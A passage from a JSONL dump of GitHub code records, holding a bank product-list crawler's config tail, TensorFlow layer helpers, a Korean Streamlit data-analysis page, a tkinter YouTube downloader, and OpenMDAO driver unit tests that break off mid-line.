WindowsWechat(0x6307062c)',\n 'content-type': 'application/json;charset=UTF-8',\n 'sec-fetch-site': 'same-origin',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-dest': 'empty',\n 'referer': 'https://wap.cgbchina.com.cn/h5-mobilebank-web/h5/investment/self/list?srcChannel=WX&secondaryChannel=WX&mainChannel=400&tab=1&srcScene=GFYHGZH&channel=400&sChannel=MB&faceFlag=LS&isRegistCS=1&HMBA_STACK_HASH=1663748433050',\n 'accept-encoding': 'gzip, deflate, br',\n 'accept-language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',\n },\n 'method': 'post'\n },\n identifier='gfyh',\n field_value_mapping={\n 'issPrice': lambda x: str(x) + '元',\n 'prdAttr': lambda x: '非保本浮动收益类' if str(x) == \"1\" else '保本浮动收益类'\n },\n field_name_2_new_field_name={\n 'prdName': FIELD_MAPPINGS['产品名称'],\n 'prdName2': FIELD_MAPPINGS['产品简称'],\n 'prdCode': FIELD_MAPPINGS['产品编码'],\n 'tACode': FIELD_MAPPINGS['TA编码'],\n 'tAName': FIELD_MAPPINGS['TA名称'],\n 'riskLevel': FIELD_MAPPINGS['风险等级'],\n 'investManagerName': FIELD_MAPPINGS['管理人'],\n 'issPrice': FIELD_MAPPINGS['发行价'],\n 'iPOEndDate': FIELD_MAPPINGS['募集结束日期'],\n 'iPOStartDate': FIELD_MAPPINGS['募集起始日期'],\n 'estabDate': FIELD_MAPPINGS['产品起始日期'],\n 'endDate': FIELD_MAPPINGS['产品结束日期'],\n 'curType': FIELD_MAPPINGS['币种'],\n 'nAV': FIELD_MAPPINGS['净值'],\n 'nAVDate': FIELD_MAPPINGS['净值日期'],\n 'totLimitStr': FIELD_MAPPINGS['总额度'],\n 'yieldName': 'yieldName',\n 'yieldName2': 'yieldName2',\n 'yieldVal2': 'yieldVal2'\n },\n check_props=['logId', 'cpbm']\n)\n\n__all__ = ['gfyh_crawl_mobile']\n","repo_name":"wuyiping2019/kb_graph_sync","sub_path":"广发银行/gfyh_mobile.py","file_name":"gfyh_mobile.py","file_ext":"py","file_size_in_byte":8448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20943173669","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nimport numpy as np\nimport tensorflow as tf\n\nimport logger\n\nlog = logger.get()\n\n\n\n\ndef weight_variable(shape,\n init_method=None,\n dtype=tf.float32,\n init_param=None,\n wd=None,\n name=None,\n trainable=True,\n seed=0):\n \"\"\"Declares a variable.\n\n Args:\n shape: Shape of the weights, list of int.\n init_method: Initialization method, \"constant\" or \"truncated_normal\".\n init_param: Initialization parameters, dictionary.\n wd: Weight decay, float.\n name: Name of the variable, str.\n trainable: Whether the variable can be trained, bool.\n\n Returns:\n var: Declared variable.\n \"\"\"\n if dtype != tf.float32:\n log.warning(\"Not using float32, currently using {}\".format(dtype))\n if init_method is None:\n initializer = tf.zeros_initializer(shape, dtype=dtype)\n elif init_method == \"truncated_normal\":\n if \"mean\" not in init_param:\n mean = 0.0\n else:\n mean = init_param[\"mean\"]\n if \"stddev\" not in init_param:\n stddev = 0.1\n else:\n stddev = init_param[\"stddev\"]\n log.info(\"Normal initialization std {:.3e}\".format(stddev))\n initializer = tf.truncated_normal_initializer(\n mean=mean, stddev=stddev, seed=seed, dtype=dtype)\n elif init_method == \"uniform_scaling\":\n if \"factor\" not in init_param:\n factor = 1.0\n else:\n factor = init_param[\"factor\"]\n log.info(\"Uniform initialization scale {:.3e}\".format(factor))\n initializer = tf.uniform_unit_scaling_initializer(\n factor=factor, seed=seed, dtype=dtype)\n elif init_method == \"constant\":\n if \"val\" not in init_param:\n value = 0.0\n else:\n value = init_param[\"val\"]\n initializer = tf.constant_initializer(value=value, dtype=dtype)\n elif init_method == \"xavier\":\n initializer = tf.contrib.layers.xavier_initializer(\n uniform=False, seed=seed, dtype=dtype)\n else:\n raise ValueError(\"Non supported initialization method!\")\n try:\n shape_int = [int(ss) for ss in shape]\n log.info(\"Weight shape {}\".format(shape_int))\n except:\n pass\n if wd is not None:\n if wd > 0.0:\n reg = lambda x: tf.multiply(tf.nn.l2_loss(x), wd)\n log.info(\"Weight decay {}\".format(wd))\n else:\n log.warning(\"No weight decay\")\n reg = None\n else:\n log.warning(\"No weight decay\")\n reg = None\n var = tf.get_variable(\n name,\n shape,\n initializer=initializer,\n regularizer=reg,\n dtype=dtype,\n trainable=trainable)\n log.info(\"Initialized weight {}\".format(var.name))\n return var\n\n\ndef weight_variable_cpu(shape,\n init_method=None,\n dtype=tf.float32,\n init_param=None,\n wd=None,\n name=None,\n trainable=True,\n seed=0):\n \"\"\"Declares variables on CPU.\"\"\"\n with tf.device(\"/cpu:0\"):\n return weight_variable(\n shape,\n init_method=init_method,\n dtype=dtype,\n init_param=init_param,\n wd=wd,\n name=name,\n trainable=trainable,\n seed=seed)\n\n\ndef batch_norm(x,\n is_training,\n gamma=None,\n beta=None,\n # axes=[0, 1, 2],\n axes=[0],\n eps=1e-10,\n name=\"bn_out\",\n decay=0.99,\n dtype=tf.float32):\n \"\"\"Applies batch normalization.\n Collect mean and variances on x except the last dimension. And apply\n normalization as below:\n x_ = gamma * (x - mean) / sqrt(var + eps) + beta\n\n Args:\n x: Input tensor, [B, ...].\n n_out: Integer, depth of input variable.\n gamma: Scaling parameter.\n beta: Bias parameter.\n axes: Axes to collect statistics.\n eps: Denominator bias.\n\n Returns:\n normed: Batch-normalized variable.\n mean: Mean used for normalization (optional).\n \"\"\"\n n_out = x.get_shape()[-1]\n try:\n n_out = int(n_out)\n shape = [n_out]\n except:\n shape = None\n emean = tf.get_variable(\n \"ema_mean\",\n shape=shape,\n trainable=False,\n dtype=dtype,\n initializer=tf.constant_initializer(\n 0.0, dtype=dtype))\n evar = tf.get_variable(\n \"ema_var\",\n shape=shape,\n trainable=False,\n dtype=dtype,\n initializer=tf.constant_initializer(\n 1.0, dtype=dtype))\n if is_training:\n mean, var = tf.nn.moments(x, axes, name=\"moments\")\n ema_mean_op = tf.assign_sub(emean, (emean - mean) * (1 - decay))\n ema_var_op = tf.assign_sub(evar, (evar - var) * (1 - decay))\n normed = tf.nn.batch_normalization(\n x, mean, var, beta, gamma, eps, name=name)\n return normed, [ema_mean_op, ema_var_op]\n else:\n normed = tf.nn.batch_normalization(\n x, emean, evar, beta, gamma, eps, name=name)\n return normed, None\n","repo_name":"skywaLKer518/MultiplicativeMultimodal","sub_path":"higgs/network_var.py","file_name":"network_var.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"44"} +{"seq_id":"18325919248","text":"import streamlit as st\nimport os\nfrom PIL import Image\nfrom utils import consumer_expenditure_row as cer\n\nscript_dir = os.path.dirname(__file__) # 현재 스크립트 파일의 디렉토리 경로\nimage_dir = os.path.join(script_dir, 'picture') # 상위 디렉토리의 image 폴더 경로\n\nspend_image1 = Image.open(os.path.join(image_dir, 'spend1.png'))\n\ndef spend():\n st.write('\\n')\n st.write('\\n')\n st.subheader('4개년도 분기별 가계 소비지출 현황')\n st.write('분기별 가계 소비지출 현황데이터는 Kosis 포털에서 csv파일을 다운받아 사용하였습니다.')\n st.write(f'Kosis 가구당 월평균 가계수지: https://kosis.kr/statHtml/statHtml.do?orgId=101&tblId=DT_1L9U001&vw_cd=MT_ZTITLE&list_id=G_A_10_003_001&seqNo=&lang_mode=ko&language=kor&obj_var_id=&itm_id=&conn_path=MT_ZTITLE')\n st.write('\\n')\n st.write('\\n')\n st.write('<b>1. 데이터를 csv파일로 다운</b>', unsafe_allow_html=True)\n st.image(spend_image1)\n st.write('csv로 받은 파일에서 필요한 데이터를 확인합니다. 코로나 전후 가계당 소비가 줄었는지 늘었는지 비교하기 위해'\n '전체가구를 기준으로 소비지출 데이터만 추출할 예정입니다. ')\n\n st.write('\\n')\n st.write('\\n')\n st.write('<b>2. 데이터 전처리</b>', unsafe_allow_html=True)\n cer.spend_pd()\n\n\n st.write('월평균 가계수지 데이터는 열에 전체가구, 근로가구, 근로외 가구가 나뉘어져있는데 '\n '전반적인 소비패턴을 파악하기 위해 전체가구에서 추출하였습니다. 이렇게 추출한 데이터로 matplotlib을 사용하여 그래프를 그려주었습니다.')\n\n\n","repo_name":"Kwon-JiHyeon/Covid-19_Change_in_Consumption_Patterns","sub_path":"utils/consumer_expenditure_utils.py","file_name":"consumer_expenditure_utils.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69996955652","text":"from pytube import YouTube\r\nfrom tkinter import Tk, Label, Entry, Button, StringVar, messagebox, filedialog, PhotoImage\r\nfrom threading import Thread\r\nfrom fpdf import FPDF\r\nimport os\r\nimport pytube\r\n\r\n\r\nclass YouTubeDownloader:\r\n def __init__(self, root):\r\n self.root = root\r\n self.root.title(\"[TEST FOR LEARNING]YouTube Downloader\")\r\n\r\n self.logo_image_yt = PhotoImage(file=\"logos/youtube.png\")\r\n self.logo_label_1 = Label(root, image=self.logo_image_yt)\r\n self.logo_label_1.pack()\r\n\r\n self.url_label = Label(root, text=\"YouTube URL:\")\r\n self.url_label.pack()\r\n\r\n self.url_var = StringVar()\r\n self.url_entry = Entry(root, textvariable=self.url_var, width=75)\r\n self.url_entry.pack()\r\n\r\n self.logo_image_drctry = PhotoImage(file=\"logos/folder.png\")\r\n self.logo_label_2 = Label(root, image=self.logo_image_drctry)\r\n self.logo_label_2.pack()\r\n\r\n self.directory_label = Label(root, text=\"Save Directory:\")\r\n self.directory_label.pack()\r\n\r\n self.directory_var = StringVar()\r\n self.directory_entry = Entry(root, textvariable=self.directory_var, width=75)\r\n self.directory_entry.pack()\r\n\r\n self.browse_button = Button(root, text=\"Save\", command=self.browse_directory)\r\n self.browse_button.pack()\r\n\r\n self.download_button = Button(root, text=\"Download\", command=self.download)\r\n self.download_button.pack()\r\n\r\n def browse_directory(self):\r\n selected_dir = filedialog.askdirectory()\r\n self.directory_var.set(selected_dir)\r\n\r\n def download(self):\r\n url = self.url_var.get()\r\n save_dir = self.directory_var.get()\r\n\r\n if not url or not save_dir:\r\n messagebox.showerror(\"Error: \", \"Please, provide URL and save directory!\")\r\n return\r\n\r\n try:\r\n youtube = pytube.YouTube(url)\r\n video_stream = youtube.streams.get_highest_resolution()\r\n\r\n def format_video_length(length_in_seconds):\r\n hours, remainder = divmod(length_in_seconds, 3600)\r\n minutes, seconds = divmod(remainder, 60)\r\n return f\"{hours:02}:{minutes:02}:{seconds:02}\"\r\n\r\n def format_view_count(views):\r\n if views >= 1000000:\r\n return f\"{views // 1000000} Million {views % 1000000 // 1000} Thousand {views % 1000} times\"\r\n elif views >= 1000:\r\n return f\"{views // 1000} Thousand {views % 1000} times\"\r\n else:\r\n return f\"{views} times\"\r\n\r\n def download_thread():\r\n try:\r\n video_stream.download(output_path=save_dir)\r\n messagebox.showinfo(\"Success!\", \"Download Complete!\")\r\n\r\n video_info = {\r\n \"Video Title\": youtube.title,\r\n \"Video Owner\": youtube.author,\r\n \"Thumbnail Image\": youtube.thumbnail_url,\r\n \"Video Description\": youtube.description,\r\n \"Video Length\": format_video_length(youtube.length),\r\n \"Video Rating\": youtube.rating,\r\n \"View Count\": format_view_count(youtube.views)\r\n }\r\n\r\n pdf = FPDF()\r\n pdf.add_page()\r\n pdf.set_font(\"Arial\", size=12)\r\n pdf.cell(200, 10, \"Video Metadata\", ln=True, align=\"C\")\r\n pdf.ln(10)\r\n for key, value in video_info.items():\r\n pdf.cell(0, 10, f\"{key}: {value}\", ln=True)\r\n pdf_file_path = os.path.join(save_dir, f\"{youtube.title}_metadata.pdf\")\r\n pdf.output(pdf_file_path)\r\n\r\n messagebox.showinfo(\"Success!\", \"Download, Metadata Extraction, and Subtitles Extraction Complete!\")\r\n\r\n self.url_var.set('')\r\n self.directory_var.set('')\r\n\r\n except Exception as e:\r\n messagebox.showerror(\"Error: \", f\"An Error Occurred: {str(e)}\")\r\n\r\n download_thread_instance = Thread(target=download_thread)\r\n download_thread_instance.start()\r\n\r\n except Exception as e:\r\n messagebox.showerror(\"Error: \", f\"An Error Occurred: {str(e)}\")\r\n\r\n\r\ndef main():\r\n root = Tk()\r\n app = YouTubeDownloader(root)\r\n root.mainloop()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"tnctungkl/yt_downloader_for_training_test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"72808551812","text":"\"\"\" Test for the Driver class -- basic driver interface.\"\"\"\n\nfrom pprint import pformat\nimport unittest\nimport warnings\n\nimport numpy as np\n\nfrom openmdao.api import ExecComp, IndepVarComp, Component, Driver, Group, Problem\nfrom openmdao.drivers.scipy_optimizer import ScipyOptimizer\nfrom openmdao.test.util import assert_rel_error\nfrom openmdao.test.paraboloid import Paraboloid\nfrom openmdao.test.simple_comps import ArrayComp2D\nfrom openmdao.test.sellar import SellarDerivatives\nfrom openmdao.util.options import OptionsDictionary\nfrom openmdao.util.record_util import create_local_meta, update_local_meta\n\n\nclass MySimpleDriver(Driver):\n\n def __init__(self):\n super(MySimpleDriver, self).__init__()\n\n # What we support\n self.supports['inequality_constraints'] = True\n self.supports['equality_constraints'] = False\n self.supports['linear_constraints'] = False\n self.supports['multiple_objectives'] = False\n\n # My driver options\n self.options = OptionsDictionary()\n self.options.add_option('tol', 1e-4)\n self.options.add_option('maxiter', 10)\n\n self.alpha = .01\n self.violated = []\n\n def run(self, problem):\n \"\"\" Mimic a very simplistic unconstrained optimization.\"\"\"\n\n # Get dicts with pointers to our vectors\n params = self.get_desvars()\n objective = self.get_objectives()\n constraints = self.get_constraints()\n\n indep_list = params.keys()\n objective_names = list(objective.keys())\n constraint_names = list(constraints.keys())\n unknown_list = objective_names + constraint_names\n\n itercount = 0\n while itercount < self.options['maxiter']:\n\n # Run the model\n problem.root.solve_nonlinear()\n #print('z1: %f, z2: %f, x1: %f, y1: %f, y2: %f' % (problem['z'][0],\n #problem['z'][1],\n #problem['x'],\n #problem['y1'],\n #problem['y2']))\n #print('obj: %f, con1: %f, con2: %f' % (problem['obj'], problem['con1'],\n #problem['con2']))\n\n # Calculate gradient\n J = problem.calc_gradient(indep_list, unknown_list, return_format='dict')\n\n objective = self.get_objectives()\n constraints = self.get_constraints()\n\n for key1 in objective_names:\n for key2 in indep_list:\n\n grad = J[key1][key2] * objective[key1]\n new_val = params[key2] - self.alpha*grad\n\n # Set parameter\n self.set_desvar(key2, new_val)\n\n self.violated = []\n for name, val in constraints.items():\n if np.linalg.norm(val) > 0.0:\n self.violated.append(name)\n\n itercount += 1\n\n\nclass Rosenbrock(Component):\n def __init__(self, size=2):\n super(Rosenbrock, self).__init__()\n self.add_param('x', val=np.zeros(size))\n self.add_output('f', val=0.0)\n self.add_output('xxx', val=np.zeros(size))\n\n def solve_nonlinear(self, params, unknowns, resids):\n\n unknowns['f'] = rosen(params['x'])\n\n\nclass ScaleAddDriver(Driver):\n\n def run(self, problem):\n \"\"\" Save away scaled info.\"\"\"\n\n self._problem = problem\n self.metadata = create_local_meta(None, 'test')\n self.iter_count = 0\n update_local_meta(self.metadata, (self.iter_count,))\n\n params = self.get_desvars()\n param_meta = self.get_desvar_metadata()\n\n self.set_desvar('x', 0.5)\n problem.root.solve_nonlinear()\n\n objective = self.get_objectives()\n constraint = self.get_constraints()\n\n # Stuff we saved should be in the scaled coordinates.\n self.param = params['x']\n self.obj_scaled = objective['f_xy']\n self.con_scaled = constraint['con']\n self.param_high = param_meta['x']['upper']\n self.param_low = param_meta['x']['lower']\n\n\nclass ScaleAddDriverArray(Driver):\n\n def run(self, problem):\n \"\"\" Save away scaled info.\"\"\"\n\n self._problem = problem\n self.metadata = create_local_meta(None, 'test')\n self.iter_count = 0\n update_local_meta(self.metadata, (self.iter_count,))\n\n params = self.get_desvars()\n param_meta = self.get_desvar_metadata()\n\n self.set_desvar('x', np.array([22.0, 404.0, 9009.0, 121000.0]))\n problem.root.solve_nonlinear()\n\n objective = self.get_objectives()\n constraint = self.get_constraints()\n\n # Stuff we saved should be in the scaled coordinates.\n self.param = params['x']\n self.obj_scaled = objective['y']\n self.con_scaled = constraint['con']\n self.param_low = param_meta['x']['lower']\n\n\nclass TestDriver(unittest.TestCase):\n\n def test_mydriver(self):\n\n prob = Problem()\n root = prob.root = SellarDerivatives()\n\n prob.driver = MySimpleDriver()\n prob.driver.add_desvar('z', lower=-100.0, upper=100.0)\n\n prob.driver.add_objective('obj')\n prob.driver.add_constraint('con1', upper=0.0)\n prob.driver.add_constraint('con2', upper=0.0)\n\n prob.setup(check=False)\n prob.run()\n\n obj = prob['obj']\n self.assertLess(obj, 28.0)\n\n def test_scaler_adder(self):\n\n prob = Problem()\n root = prob.root = Group()\n driver = prob.driver = ScaleAddDriver()\n\n root.add('p1', IndepVarComp([('x',60000.0,{'desc':'my x'}),\n ('y',60000.0,{'desc':'my y'})]), promotes=['*'])\n root.add('comp', Paraboloid(), promotes=['*'])\n root.add('constraint', ExecComp('con=f_xy + x + y'), promotes=['*'])\n\n driver.add_desvar('x', lower=59000.0, upper=61000.0, adder=-60000.0, scaler=1/1000.0)\n driver.add_objective('f_xy', adder=-10890367002.0, scaler=1.0/20)\n driver.add_constraint('con', upper=0.0, adder=-10890487502.0, scaler=1.0/20)\n\n prob.setup(check=False)\n prob.run()\n\n self.assertEqual(driver.param_high, 1.0)\n self.assertEqual(driver.param_low, -1.0)\n self.assertEqual(driver.param, 0.0)\n self.assertEqual(prob['x'], 60500.0)\n self.assertEqual(driver.obj_scaled[0], 1.0)\n self.assertEqual(driver.con_scaled[0], 1.0)\n\n def test_scaler_adder_int(self):\n\n prob = Problem()\n root = prob.root = Group()\n driver = prob.driver = ScaleAddDriver()\n\n root.add('p1', IndepVarComp([('x',12.0,{'desc':'my x'}),\n ('y',13.0,{'desc':'my y'})]), promotes=['*'])\n root.add('comp', Paraboloid(), promotes=['*'])\n root.add('constraint', ExecComp('con=f_xy + x + y'), promotes=['*'])\n\n driver.add_desvar('x', adder=-10, scaler=20.0)\n driver.add_objective('f_xy', adder=-10, scaler=20)\n driver.add_constraint('con', upper=0, adder=-10, scaler=20)\n\n prob.setup(check=False)\n prob.run()\n\n self.assertEqual(driver.param, 40.0)\n self.assertEqual(prob['x'], 10.025)\n assert_rel_error(self, driver.obj_scaled[0], 9113.5125, 1e-6)\n assert_rel_error(self, driver.con_scaled[0], 9574.0125, 1e-6)\n\n J = driver.calc_gradient(['x', 'y'], ['f_xy'])\n assert_rel_error(self, J[0][0], 27.05, 1e-6)\n assert_rel_error(self, J[0][1], 880.5, 1e-6)\n\n def test_scaler_adder_array(self):\n\n prob = Problem()\n root = prob.root = Group()\n driver = prob.driver = ScaleAddDriverArray()\n\n root.add('p1', IndepVarComp('x', val=np.array([[1.0, 1.0], [1.0, 1.0]])),\n promotes=['*'])\n root.add('comp', ArrayComp2D(), promotes=['*'])\n root.add('constraint', ExecComp('con = x + y',\n x=np.array([[1.0, 1.0], [1.0, 1.0]]),\n y=np.array([[1.0, 1.0], [1.0, 1.0]]),\n con=np.array([[1.0, 1.0], [1.0, 1.0]])),\n promotes=['*'])\n\n driver.add_desvar('x', lower=np.array([[-1e5, -1e5], [-1e5, -1e5]]),\n upper=np.array([1e25, 1e25, 1e25, 1e25]),\n adder=np.array([[10.0, 100.0], [1000.0, 10000.0]]),\n scaler=np.array([[1.0, 2.0], [3.0, 4.0]]))\n driver.add_objective('y', adder=np.array([[10.0, 100.0], [1000.0, 10000.0]]),\n scaler=np.array([[1.0, 2.0], [3.0, 4.0]]))\n driver.add_constraint('con', upper=np.zeros((2, 2)), adder=np.array([[10.0, 100.0], [1000.0, 10000.0]]),\n scaler=np.array([[1.0, 2.0], [3.0, 4.0]]))\n\n prob.setup(check=False)\n prob.run()\n\n self.assertEqual(driver.param[0], 11.0)\n self.assertEqual(driver.param[1], 202.0)\n self.assertEqual(driver.param[2], 3003.0)\n self.assertEqual(driver.param[3], 40004.0)\n self.assertEqual(prob['x'][0, 0], 12.0)\n self.assertEqual(prob['x'][0, 1], 102.0)\n self.assertEqual(prob['x'][1, 0], 2003.0)\n self.assertEqual(prob['x'][1, 1], 20250.0)\n self.assertEqual(driver.obj_scaled[0], (prob['y'][0, 0] + 10.0)*1.0)\n self.assertEqual(driver.obj_scaled[1], (prob['y'][0, 1] + 100.0)*2.0)\n self.assertEqual(driver.obj_scaled[2], (prob['y'][1, 0] + 1000.0)*3.0)\n self.assertEqual(driver.obj_scaled[3], (prob['y'][1, 1] + 10000.0)*4.0)\n self.assertEqual(driver.param_low[0], (-1e5 + 10.0)*1.0)\n self.assertEqual(driver.param_low[1], (-1e5 + 100.0)*2.0)\n self.assertEqual(driver.param_low[2], (-1e5 + 1000.0)*3.0)\n self.assertEqual(driver.param_low[3], (-1e5 + 10000.0)*4.0)\n conval = prob['x'] + prob['y']\n self.assertEqual(driver.con_scaled[0], (conval[0, 0] + 10.0)*1.0)\n self.assertEqual(driver.con_scaled[1], (conval[0, 1] + 100.0)*2.0)\n self.assertEqual(driver.con_scaled[2], (conval[1, 0] + 1000.0)*3.0)\n self.assertEqual(driver.con_scaled[3], (conval[1, 1] + 10000.0)*4.0)\n\n def test_scaler_adder_array_inf(self):\n\n # make sure inf doesn't bomb out\n\n prob = Problem()\n root = prob.root = Group()\n driver = prob.driver = ScaleAddDriverArray()\n\n root.add('p1', IndepVarComp('x', val=np.array([[1.0, 1.0], [1.0, 1.0]])),\n promotes=['*'])\n root.add('comp', ArrayComp2D(), promotes=['*'])\n root.add('constraint', ExecComp('con = x + y',\n x=np.array([[1.0, 1.0], [1.0, 1.0]]),\n y=np.array([[1.0, 1.0], [1.0, 1.0]]),\n con=np.array([[1.0, 1.0], [1.0, 1.0]])),\n promotes=['*'])\n\n driver.add_desvar('x', lower=np.array([[-1e5, -1e5], [-np.inf, -1e5]]),\n upper=np.array([1e25, 1e25, np.inf, 1e25]),\n adder=np.array([[10.0, 100.0], [1000.0, 10000.0]]),\n scaler=np.array([[1.0e-2, 2.0], [3.0, 4.0e12]]))\n driver.add_objective('y', adder=np.array([[10.0, 100.0], [1000.0, 10000.0]]),\n scaler=np.array([[1.0, 2.0], [3.0, 4.0]]))\n driver.add_constraint('con', upper=np.zeros((2, 2)), adder=np.array([[10.0, 100.0], [1000.0, 10000.0]]),\n scaler=np.array([[1.0, 2.0], [3.0, 4.0]]))\n\n prob.setup(check=False)\n prob.run()\n\n def test_scaler_adder_array_int(self):\n\n prob = Problem()\n root = prob.root = Group()\n driver = prob.driver = ScaleAddDriverArray()\n\n root.add('p1', IndepVarComp('x', val=np.array([[1.0, 1.0], [1.0, 1.0]])),\n promotes=['*'])\n root.add('comp', ArrayComp2D(), promotes=['*'])\n root.add('constraint', ExecComp('con = x + y',\n x=np.array([[1.0, 1.0], [1.0, 1.0]]),\n y=np.array([[1.0, 1.0], [1.0, 1.0]]),\n con=np.array([[1.0, 1.0], [1.0, 1.0]])),\n promotes=['*'])\n\n driver.add_desvar('x', lower=np.array([[-1e5, -1e5], [-1e5, -1e5]]),\n adder=np.array([[10, 100], [1000, 10000]]),\n scaler=np.array([[1, 2], [3, 4]]))\n driver.add_objective('y', adder=np.array([[10, 100], [1000, 10000]]),\n scaler=np.array([[1, 2], [3, 4]]))\n driver.add_constraint('con', upper=np.zeros((2, 2)), adder=np.array([[10, 100], [1000, 10000]]),\n scaler=np.array([[1, 2], [3, 4]]))\n\n prob.setup(check=False)\n prob.run()\n\n self.assertEqual(driver.param[0], 11.0)\n self.assertEqual(driver.param[1], 202.0)\n self.assertEqual(driver.param[2], 3003.0)\n self.assertEqual(driver.param[3], 40004.0)\n self.assertEqual(prob['x'][0, 0], 12.0)\n self.assertEqual(prob['x'][0, 1], 102.0)\n self.assertEqual(prob['x'][1, 0], 2003.0)\n self.assertEqual(prob['x'][1, 1], 20250.0)\n self.assertEqual(driver.obj_scaled[0], (prob['y'][0, 0] + 10.0)*1.0)\n self.assertEqual(driver.obj_scaled[1], (prob['y'][0, 1] + 100.0)*2.0)\n self.assertEqual(driver.obj_scaled[2], (prob['y'][1, 0] + 1000.0)*3.0)\n self.assertEqual(driver.obj_scaled[3], (prob['y'][1, 1] + 10000.0)*4.0)\n self.assertEqual(driver.param_low[0], (-1e5 + 10.0)*1.0)\n self.assertEqual(driver.param_low[1], (-1e5 + 100.0)*2.0)\n self.assertEqual(driver.param_low[2], (-1e5 + 1000.0)*3.0)\n self.assertEqual(driver.param_low[3], (-1e5 + 10000.0)*4.0)\n conval = prob['x'] + prob['y']\n self.assertEqual(driver.con_scaled[0], (conval[0, 0] + 10.0)*1.0)\n self.assertEqual(driver.con_scaled[1], (conval[0, 1] + 100.0)*2.0)\n self.assertEqual(driver.con_scaled[2], (conval[1, 0] + 1000.0)*3.0)\n self.assertEqual(driver.con_scaled[3], (conval[1, 1] + 10000.0)*4.0)\n\n J = driver.calc_gradient(['x'], ['y', 'con'])\n Jbase = np.array([[ 2., 1., 3., 7.],\n [ 4., 2., 6., 5.],\n [ 3., 6., 9., 8.],\n [ 1., 3., 2., 4.],\n [ 3., 1., 3., 7.],\n [ 4., 3., 6., 5.],\n [ 3., 6., 10., 8.],\n [ 1., 3., 2., 5.]])\n assert_rel_error(self, J, Jbase, 1e-6)\n\n def test_array_scaler_bug(self):\n\n class Paraboloid(Component):\n\n def __init__(self):\n super(Paraboloid, self).__init__()\n\n self.add_param('X', val=np.array([0.0, 0.0]))\n self.add_output('f_xy', val=0.0)\n\n def solve_nonlinear(self, params, unknowns, resids):\n X = params['X']\n x = X[0]\n y = X[1]\n unknowns['f_xy'] = (1000.*x-3.)**2 + (1000.*x)*(0.01*y) + (0.01*y+4.)**2 - 3.\n\n def linearize(self, params, unknowns, resids):\n \"\"\" Jacobian for our paraboloid.\"\"\"\n X = params['X']\n J = {}\n\n x = X[0]\n y = X[1]\n\n J['f_xy', 'X'] = np.array([[ 2000000.0*x - 6000.0 + 10.0*y,\n 0.0002*y + 0.08 + 10.0*x]])\n return J\n\n top = Problem()\n\n root = top.root = Group()\n root.deriv_options['type'] = 'fd'\n\n root.add('p1', IndepVarComp('X', np.array([3.0, -4.0])))\n root.add('p', Paraboloid())\n\n root.connect('p1.X', 'p.X')\n\n top.driver = ScipyOptimizer()\n top.driver.options['optimizer'] = 'SLSQP'\n top.driver.options['tol'] = 1e-12\n\n top.driver.add_desvar('p1.X',\n lower=np.array([-1000.0, -1000.0]),\n upper=np.array([1000.0, 1000.0]),\n scaler=np.array([1000., 0.01]))\n top.driver.add_objective('p.f_xy')\n\n top.setup(check=False)\n top.run()\n\n # Optimal solution (minimum): x = 6.6667; y = -7.3333\n # Note: this scaling isn't so great, but at least we know it works\n # and the bug is fixed.\n assert_rel_error(self, top['p1.X'][0], 6.666667/1000.0, 1e-3)\n assert_rel_error(self, top['p1.X'][1], -7.333333/0.01, 1e-3)\n\n def test_driver_unicode_variable(self):\n # this tests that unicode design variables and objectives works in python 2.\n prob = Problem(root=Group())\n root = prob.root\n\n # simple paraboloid example from tutorial\n root.add('p1', IndepVarComp('x0', 3.0), promotes=['*'])\n root.add('p2', IndepVarComp('y0', -4.0), promotes=['*'])\n root.add('p', ExecComp('f_xy = (x0 - 3.0)**2 + x0 * y0 + (y0 + 4.0)**2 - 3.0'), promotes=['*'])\n\n prob.driver = ScipyOptimizer()\n prob.driver.options['optimizer'] = 'SLSQP'\n\n prob.driver.add_desvar(u'x0', lower=-50, upper=50)\n prob.driver.add_desvar(u'y0', lower=-50, upper=50)\n prob.driver.add_objective(u'f_xy')\n prob.driver.options['disp'] = False\n\n prob.setup(check=False)\n\n prob['x0'] = 3.0\n prob['y0'] = -4.0\n\n prob.run()\n\n assert_rel_error(self, prob['f_xy'], -27.33333, 1e-3)\n\n def test_eq_ineq_error_messages(self):\n\n prob = Problem()\n root = prob.root = SellarDerivatives()\n\n prob.driver = MySimpleDriver()\n\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_constraint('con1')\n\n self.assertEqual(str(cm.exception), \"Constraint 'con1' needs to define lower, upper, or equals.\")\n\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_constraint('con1', lower=0.0, upper=1.1, equals=2.2)\n\n self.assertEqual(str(cm.exception), \"Constraint 'con1' cannot be both equality and inequality.\")\n\n # Don't try this at home, kids\n prob.driver.supports['two_sided_constraints'] = False\n\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_constraint('con1', lower=0.0, upper=1.1)\n\n self.assertEqual(str(cm.exception), \"Driver does not support 2-sided constraint 'con1'.\")\n\n # Don't try this at home, kids\n prob.driver.supports['equality_constraints'] = False\n\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_constraint('con1', equals=0.0)\n\n self.assertEqual(str(cm.exception), \"Driver does not support equality constraint 'con1'.\")\n\n # Don't try this at home, kids\n prob.driver.supports['inequality_constraints'] = False\n\n with self.assertRaises(RuntimeError) as cm:\n prob.driver.add_constraint('con1', upper=0.0)\n\n self.assertEqual(str(cm.exception), \"Driver does not support inequality constraint 'con1'.\")\n\n def test_index_error_messages_param(self):\n\n prob = Problem()\n prob.root = Group()\n prob.root.deriv_options['type'] = 'fd'\n prob.root.ln_solver.options['mode'] = 'auto'\n\n prob.root.add('myparams', IndepVarComp('x', np.zeros(4)))\n prob.root.add('rosen', Rosenbrock(4))\n\n prob.root.connect('myparams.x', 'rosen.x')\n\n prob.driver = MySimpleDriver()\n prob.driver.add_desvar('myparams.x', indices=[0, 